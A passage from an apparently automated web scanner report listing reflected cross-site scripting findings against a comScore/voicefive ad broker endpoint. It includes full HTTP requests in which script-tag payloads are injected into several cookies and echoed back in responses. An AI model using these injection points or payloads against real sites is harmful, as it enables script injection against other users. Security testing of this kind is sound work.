Set-Cookie: ar_p97174789=exp=51&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 12 13:33:33 2011&prad=253735207&arc=207615189&; expires=Wed 10-Aug-2011 13:33:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25944

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"207615189",Location:
...[SNIP]...
011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&', "BMX_3PC": '168287<script>alert(1)</script>04ab1212fa', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

2.139. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 760be<script>alert(1)</script>4fe4a12fecf was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=207615189 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C760be<script>alert(1)</script>4fe4a12fecf; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:33:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=51&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 12 13:33:33 2011&prad=253735207&arc=207615189&; expires=Wed 10-Aug-2011 13:33:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25945

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"207615189",Location:
...[SNIP]...
096&', "ar_p82806590": 'exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C760be<script>alert(1)</script>4fe4a12fecf', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...

2.140. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 9cb96<script>alert(1)</script>8bdea76f6f2 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-13033490469cb96<script>alert(1)</script>8bdea76f6f2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:27 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206907; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
;
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-13033490469cb96<script>alert(1)</script>8bdea76f6f2', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p97174789": 'exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 1
...[SNIP]...

2.141. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9c95c<script>alert(1)</script>02d6ede0968 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&9c95c<script>alert(1)</script>02d6ede0968; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&9c95c<script>alert(1)</script>02d6ede0968', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

2.142. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 144cd<script>alert(1)</script>4dc26a7e82d was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&144cd<script>alert(1)</script>4dc26a7e82d; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&144cd<script>alert(1)</script>4dc26a7e82d=&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&144cd<script>alert(1)</script>4dc26a7e82d', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...

2.143. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload ff2c8<script>alert(1)</script>9d7c9813128 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&ff2c8<script>alert(1)</script>9d7c9813128; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&ff2c8<script>alert(1)</script>9d7c9813128', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobu
...[SNIP]...

2.144. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 45b83<script>alert(1)</script>dbcb87bd638 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&45b83<script>alert(1)</script>dbcb87bd638; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
